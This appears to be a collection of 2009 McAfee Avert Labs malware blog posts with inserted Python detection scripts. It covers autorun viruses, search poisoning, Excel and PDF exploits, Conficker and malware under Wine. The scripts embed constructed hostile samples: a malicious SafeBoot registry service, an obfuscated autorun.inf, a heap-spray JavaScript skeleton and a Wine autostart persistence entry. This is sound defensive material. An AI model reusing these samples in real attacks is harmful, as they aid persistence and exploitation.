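"aux2"="C:\\WINDOWS\\system32\\wdmaud.sys"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\evilsvc]
@="Service"
"""

if __name__ == "__main__":
    base, cur = parse_reg(BASELINE_REG), parse_reg(INFECTED_REG)
    for name, data, why in suspicious_drivers32(cur):
        print(f"Drivers32 {name} = {data}: {'; '.join(why)}")
    for key in sorted(safeboot_additions(base, cur)):
        print("SafeBoot addition:", key)
```

The SafeBoot diff is deliberately baseline-driven rather than allowlist-driven: the legitimate contents of those keys vary by Windows version and installed drivers, so a snapshot from your own clean image is the only reliable reference.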

Avert Passes Milestone: 20 Million Malware Samples

One month ago, my colleague Marius Van Oers posted a blog to announce that the number of drivers in our DATs had passed 500,000. Today, McAfee reached another record: we received our twenty-millionth malware sample.

In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues. :-)

Renamed Notepad.exe Plagues Removable Drives

During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe file is renamed with a random .pif or .scr extension and is accompanied with an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

Code Snippet of W32/Sality

Accompanying Autorun.inf file

Even if the removable drive is cleaned of the virus infection, the randomly named Microsoft executable would still exist on the drive. Although benign, the leftover remnant would cause some degree of confusion about the origin of the file, especially since it’s a renamed Microsoft file with a .pif or .scr extension!

The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.
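The obfuscated autorun.inf these families drop works because the Windows INI reader only honours key=value lines inside the [autorun] section and silently skips everything else, so junk lines do not break the file. The triage parser below is an added example, not McAfee’s or the virus authors’ code: it applies the same rule and reports every launch directive whose target is an executable type, which catches the renamed notepad.exe or winmine.exe with its .pif or .scr extension. The sample file, its junk lines and the name xkqpo.pif are constructed.

```python
"""Triage parser for obfuscated autorun.inf files.

Added example (not McAfee's code). Keeps only key=value lines in [autorun],
as the Windows INI reader does, and flags launch entries that point at
executable file types such as the renamed .pif/.scr copies described above.
"""
import os

# Keys that make Windows run something when the drive is opened or clicked.
LAUNCH_KEYS = ("open", "shellexecute")
RISKY_EXT = {".pif", ".scr", ".exe", ".com", ".bat", ".cmd", ".vbs", ".js"}


def parse_autorun(text):
    """Return {launch key: value} from the [autorun] section, ignoring junk."""
    launch, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or "=" not in line:
            continue                    # junk lines with no '=' are dropped
        key, _, value = line.partition("=")
        key = key.strip().lower()
        is_cmd = key.startswith("shell\\") and key.endswith("\\command")
        if key in LAUNCH_KEYS or is_cmd:
            launch[key] = value.strip()
    return launch


def launch_target(value):
    """First token of a launch value, unquoted; arguments are not the target."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""


def assess(text):
    """[(key, target, extension)] for launch entries pointing at executables."""
    findings = []
    for key, value in parse_autorun(text).items():
        target = launch_target(value)
        ext = os.path.splitext(target)[1].lower()
        if ext in RISKY_EXT:
            findings.append((key, target, ext))
    return findings


# Constructed file in the style the post describes: valid directives buried in
# junk lines that the INI reader ignores, all pointing at a renamed executable.
SAMPLE_AUTORUN = """[autorun]
xL8tq;Q2w]V
open=xkqpo.pif
;9aZ$k
shell\\open\\Command=xkqpo.pif
rOn!7
shell\\explore\\command=xkqpo.pif
shellexecute=xkqpo.pif
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

if __name__ == "__main__":
    for key, target, ext in assess(SAMPLE_AUTORUN):
        print(f"{key} -> {target} ({ext})")
```

Run it over every autorun.inf found on a removable drive before anything on the drive is opened; a .pif or .scr target named with random letters is exactly the artifact the post says survives even after the virus itself has been cleaned.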

Google Bucking the Trend?

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

I took the top 100 search terms for each day of this week and ran a Google search on each term.  I then considered the top 10 search results for each term, looking for poisoned links with high rankings.  Admittedly it would have been better to gather the search results on each day, rather than running the test several days after the fact, but nonetheless the limited results do suggest that Google took some recent actions.

The following graph shows significant activity prior to mid-day yesterday.

We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

Search safe.

Google Trends Abused to Serve Malware

The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many placed high up on Google’s results.  The summary text was relevant for the search term, and it’s clear that those behind the redirects are manipulating the Internet (Google): not only getting their newly created sites to appear high on the search results page, but also displaying relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.

 

You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

Other searches show the results using all-lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing; this image was edited to fit on the blog).

The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

Decoding the script shows that it redirects the user based on the referring URL being “google”, “msn”, “yahoo”, “comcast” or “aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers: various fake alert and scanning messages and windows appear, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

New Excel Trojan Hits the Net

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When successful, the exploit installs a backdoor that attempts to connect to a remote site on port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

What Have We Learned From Past Virus Infections?

The year 2009 has so far been a hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

W32/Conficker infecting via SMB

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry ;-)
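The mistake described above leaves a trace in the Security log: a privileged account appears in an interactive logon on an ordinary workstation, and minutes later the same account starts authenticating to admin shares across the network. The audit below is an added example, not part of the original post. It works on records shaped like the fields of Security event 4624 (TargetUserName, LogonType, Computer, IpAddress); the account names, host names and timeline are constructed, and the thresholds are assumptions to be tuned per environment.

```python
"""
Logon-event audit for the admin-on-infected-workstation mistake.
Added example, not part of the original post.  Input records are dicts
with the 4624 fields; here they are constructed rather than read from a
Security log export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

INTERACTIVE_LOGON_TYPES = {2, 10, 11}   # console, RemoteInteractive (RDP), cached credentials
NETWORK_LOGON_TYPE = 3                  # admin-share / SMB access is logged as type 3 on the target


def privileged_interactive_logons(events, privileged_accounts, admin_hosts=()):
    """(time, account, host) for each interactive logon by a privileged
    account on a host that is not a dedicated administration host."""
    priv = {a.lower() for a in privileged_accounts}
    return [(e["TimeCreated"], e["TargetUserName"], e["Computer"])
            for e in events
            if e["EventID"] == 4624
            and e["TargetUserName"].lower() in priv
            and e["LogonType"] in INTERACTIVE_LOGON_TYPES
            and e["Computer"] not in admin_hosts]


def network_logon_fan_out(events, min_hosts=5, window=timedelta(minutes=10)):
    """{account: distinct hosts} for accounts whose network logons reach at
    least min_hosts distinct hosts inside one window: the spread pattern
    of a worm that has just acquired working credentials."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] == NETWORK_LOGON_TYPE:
            by_user[e["TargetUserName"].lower()].append((e["TimeCreated"], e["Computer"]))
    flagged = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            hosts = {host for t, host in logons[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                flagged[user] = len(hosts)
                break
    return flagged


# Constructed sample timeline (not a real capture): the support admin logs
# on at the console of infected WS-042; WS-042 (10.1.2.42) then authenticates
# to its neighbours' admin shares with that account.  Events are collected
# centrally, so "Computer" is the host that logged the event.
_T0 = datetime(2009, 2, 20, 9, 0)


def _ev(minute, user, logon_type, computer, ip):
    return {"EventID": 4624, "TimeCreated": _T0 + timedelta(minutes=minute),
            "TargetUserName": user, "LogonType": logon_type,
            "Computer": computer, "IpAddress": ip}


SAMPLE_EVENTS = (
    [_ev(0, "jdoe", 2, "WS-042", "-"),
     _ev(5, "da-support", 2, "WS-042", "-")]
    + [_ev(6 + n, "da-support", 3, "WS-%03d" % (100 + n), "10.1.2.42") for n in range(8)]
    + [_ev(20, "da-support", 10, "ADMIN-JUMP01", "10.1.0.5")]
)


def run_sample():
    """Run both checks over the constructed timeline."""
    hits = privileged_interactive_logons(SAMPLE_EVENTS, ["da-support"], admin_hosts={"ADMIN-JUMP01"})
    spread = network_logon_fan_out(SAMPLE_EVENTS)
    return hits, spread


if __name__ == "__main__":
    print(run_sample())
```

The RDP logon to ADMIN-JUMP01 is deliberately not reported: a jump host is where a domain admin is expected to log on interactively, and listing such hosts keeps the first check focused on workstations.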

Running Windows Malware in Linux

For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

  • Ubuntu Linux 8.04 [comes with Gnome desktop environment]
  • Wine 1.0 [run as a nonroot user with default settings]

I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

File Infectors

W32/Philis is a file infector that, apart from appending its code to other executables, downloads and drops other malware.

This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32” folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

Autorun Malware

W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

IRC Trojans

IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when run in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

The screen shot below shows my logging into the infected Linux machine and issuing commands:


The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:


This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

Keyloggers/Password Stealers

Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

Although stealing information using Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DoS attack or be the origin of an infection, as suggested earlier.

Scareware

This class of malware displays falsely exaggerated scan reports and tricks users into buying the product. These programs use extreme social-engineering tactics combined with obfuscated JavaScript that checks the machine for exploitable weaknesses.

Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

Screen shots below:


It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

Mitigation Techniques

  • Never run Wine applications as root.
  • Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
  • Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
  • Administrators should think twice before installing Wine on a Linux server. These machines are seldom turned off, so the problem malware faces in Wine of autostarting its code when the machine boots up, mentioned earlier, no longer applies.
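The mitigation list above can be turned into a small audit of a Wine installation. The script below is an added example, not part of the original post or of Wine: it lists host paths mapped into the prefix through `~/.wine/dosdevices` (Wine maps the host root as `z:` by default and adds CD-ROM and removable media as `d::` and so on), reports any binfmt_misc registration that hands PE files to Wine on exec, and flags desktop autostart entries whose `Exec` line runs Wine or a `.exe`, which is the persistence route the post speculates about. The directory layouts, file contents and names in `demo_fixture()` are constructed so the audit runs stand-alone against temporary directories.

```python
"""
Wine exposure audit: stray drive mappings, binfmt_misc handlers and
Windows-binary autostart entries.  Added example, not Wine's own code and
not part of the original post.  All paths are parameters so the checks can
be pointed at a real prefix or, as in demo_fixture(), at constructed dirs.
"""
import glob
import os
import shutil
import tempfile


def stray_dos_mappings(dosdevices_dir, keep=("c:",)):
    """dosdevices symlinks other than the drive_c link, as (name, target).
    Every such link is a host path that malware running under Wine can reach."""
    stray = []
    for name in sorted(os.listdir(dosdevices_dir)):
        link = os.path.join(dosdevices_dir, name)
        if os.path.islink(link) and name.lower() not in keep:
            stray.append((name, os.readlink(link)))
    return stray


def wine_binfmt_registrations(binfmt_dir="/proc/sys/fs/binfmt_misc"):
    """Names of binfmt_misc entries whose interpreter is Wine.  With one
    present, exec() of any PE file (e.g. a double-click) runs it via Wine."""
    found = []
    for path in sorted(glob.glob(os.path.join(binfmt_dir, "*"))):
        name = os.path.basename(path)
        if name in ("register", "status") or not os.path.isfile(path):
            continue
        try:
            with open(path) as fh:
                lines = fh.read().splitlines()
        except OSError:
            continue
        # entry files list e.g. "interpreter /usr/bin/wine" on its own line
        if any(line.startswith("interpreter ") and "wine" in line for line in lines):
            found.append(name)
    return found


def windows_autostart_entries(autostart_dir):
    """(file, command) for .desktop autostart entries launching Wine or a PE file."""
    hits = []
    for path in sorted(glob.glob(os.path.join(autostart_dir, "*.desktop"))):
        with open(path, errors="replace") as fh:
            for line in fh:
                if line.startswith("Exec="):
                    cmd = line[5:].strip()
                    if "wine" in cmd.lower() or ".exe" in cmd.lower():
                        hits.append((os.path.basename(path), cmd))
    return hits


def demo_fixture():
    """Build constructed prefix/binfmt/autostart dirs, audit them, clean up."""
    root = tempfile.mkdtemp(prefix="wine-audit-")
    try:
        dos = os.path.join(root, "dosdevices")
        os.makedirs(dos)
        os.symlink("../drive_c", os.path.join(dos, "c:"))   # the one mapping to keep
        os.symlink("/", os.path.join(dos, "z:"))            # Wine's default host-root mapping
        os.symlink("/dev/sr0", os.path.join(dos, "d::"))    # CD-ROM device mapping
        binfmt = os.path.join(root, "binfmt_misc")
        os.makedirs(binfmt)
        with open(os.path.join(binfmt, "wine"), "w") as fh:
            fh.write("enabled\ninterpreter /usr/bin/wine\nflags: \noffset 0\nmagic 4d5a\n")
        with open(os.path.join(binfmt, "register"), "w") as fh:
            fh.write("")
        auto = os.path.join(root, "autostart")
        os.makedirs(auto)
        with open(os.path.join(auto, "nm-applet.desktop"), "w") as fh:
            fh.write("[Desktop Entry]\nType=Application\nExec=nm-applet\n")
        with open(os.path.join(auto, "updater.desktop"), "w") as fh:   # constructed persistence entry
            fh.write("[Desktop Entry]\nType=Application\nExec=wine /home/user/.wine/drive_c/updater.exe\n")
        return (stray_dos_mappings(dos),
                wine_binfmt_registrations(binfmt),
                windows_autostart_entries(auto))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for result in demo_fixture():
        print(result)
```

Against a real machine, call the three functions with `~/.wine/dosdevices`, the default binfmt path and `~/.config/autostart` (plus the system-wide `/etc/xdg/autostart`); an empty result from each is what the mitigation list above is asking for.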

Malware Riding on the Tides of the Economic Crisis

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys are aiming precisely at people trying to save some money these days. Spam mails promoting bargains that could help in the recession are hitting inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

New BackDoor Attacks Using PDF Documents

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8.x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of code execution (see below):

malicious code execution

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor to enforce remote control and monitoring on infected systems. Further characteristics of this backdoor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm
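A heap spray of the kind described above has a recognisable shape in the document's JavaScript: a short `unescape()`'d `%u` sequence, a loop that doubles a string until it is large, and a loop that copies it into many array slots. The triage script below is an added example, not Avert Labs code and not a description of the actual sample: it extracts `/JS` and `/JavaScript` actions from a PDF (literal strings with balanced parentheses, and indirect stream objects, inflating `/FlateDecode` streams) and scores those three signs. The sample documents and their scripts are constructed with placeholder `%u9090`/`%u4141` bytes and no exploit.

```python
"""
Static triage of PDF JavaScript for heap-spray construction.  Added
example, not Avert Labs code.  The PDFs built by make_pdf() and the
LITERAL_PDF below are constructed test inputs.
"""
import re
import zlib


def _literal_string(buf, start):
    """Inner bytes of the PDF literal string whose '(' is at buf[start],
    honouring nested balanced parentheses and backslash escapes."""
    depth, i = 0, start
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\":
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return buf[start + 1:i]
        i += 1
    return buf[start + 1:]


def extract_javascript(pdf):
    """All script bodies referenced by /JS or /JavaScript keys, as str."""
    scripts = []
    for m in re.finditer(rb"/(?:JS|JavaScript)\s*\(", pdf):          # direct literal string
        scripts.append(_literal_string(pdf, m.end() - 1).decode("latin-1"))
    for m in re.finditer(rb"/(?:JS|JavaScript)\s*(\d+)\s+0\s+R", pdf):  # indirect stream object
        pat = (rb"(?s)(?<!\d)" + m.group(1) +
               rb"\s+0\s+obj\s*(<<.*?>>)\s*stream\r?\n(.*?)\r?\nendstream")
        obj = re.search(pat, pdf)
        if not obj:
            continue
        body = obj.group(2)
        if b"/FlateDecode" in obj.group(1):
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue
        scripts.append(body.decode("latin-1"))
    return scripts


SPRAY_SIGNS = {
    "unescape_short_sequence": re.compile(r"""unescape\(\s*["'](?:%u[0-9a-fA-F]{4}){1,8}["']\s*\)"""),
    "self_doubling_loop": re.compile(r"while\s*\(\s*\w+\.length\s*<[^)]*\)\s*\{?\s*(\w+)\s*\+=\s*\1\b"),
    "array_fill_loop": re.compile(r"for\s*\([^)]*\)\s*\{?\s*\w+\[\w+\]\s*="),
}


def heap_spray_score(js):
    """Which spray signs fire, plus the raw count of %uXXXX escapes."""
    hits = {name: bool(rx.search(js)) for name, rx in SPRAY_SIGNS.items()}
    hits["percent_u_count"] = len(re.findall(r"%u[0-9a-fA-F]{4}", js))
    return hits


def triage_pdf(pdf):
    """Summary for the most suspicious script in the document."""
    scripts = extract_javascript(pdf)
    worst = {"scripts": len(scripts), "signs": 0, "verdict": "no javascript"}
    for js in scripts:
        score = heap_spray_score(js)
        signs = sum(1 for k, v in score.items() if k != "percent_u_count" and v)
        if signs >= worst["signs"]:
            worst.update(signs=signs, percent_u_count=score["percent_u_count"],
                         verdict="heap spray likely" if signs >= 2 else "javascript present")
    return worst


# Constructed samples: the spray skeleton with placeholder bytes only.
SPRAY_JS = ("var nop = unescape('%u9090%u9090');"
            "var sc = unescape('%u4141%u4141%u4141%u4141');"
            "while (nop.length < 0x10000) nop += nop;"
            "var mem = new Array();"
            "for (var i = 0; i < 200; i++) mem[i] = nop + sc;")
LITERAL_PDF = (b"%PDF-1.4\n1 0 obj<</S/JavaScript/JS (app.alert('Hello (world)'))>>endobj\n%%EOF\n")


def make_pdf(js, compress=False):
    """Minimal PDF whose OpenAction runs js from stream object 2 (constructed)."""
    body, extra = js.encode("latin-1"), b""
    if compress:
        body, extra = zlib.compress(body), b"/Filter/FlateDecode"
    return (b"%PDF-1.4\n1 0 obj<</Type/Catalog/OpenAction<</S/JavaScript/JS 2 0 R>>>>endobj\n"
            b"2 0 obj<</Length " + str(len(body)).encode() + extra + b">>stream\n" + body +
            b"\nendstream\nendobj\n%%EOF\n")
```

Two signs together are treated as a spray because each one alone is common in benign scripts; the `%u` count is reported separately so an analyst can see how much encoded payload the script carries.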

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

MS09-002 Exploit in the wild uses MSWord Lure

An exploit targeting a recently patched vulnerability in Internet Explorer 7 was discovered in the wild.  Malware crooks were quick to develop a working exploit for this vulnerability, which was addressed in the February Microsoft patch release. Microsoft rated the vulnerability critical and noted that consistent exploit code was likely. The modus operandi bears close resemblance to the zero-day attack using Word documents that we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This Word document contains an embedded ActiveX control which, upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious Word document is detected with the current DATs as Exploit-MSWord.k, and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

New Valentine Scam on the Loose

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertising a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: this is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

Cybercrime, Online Threats, and the Recession

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

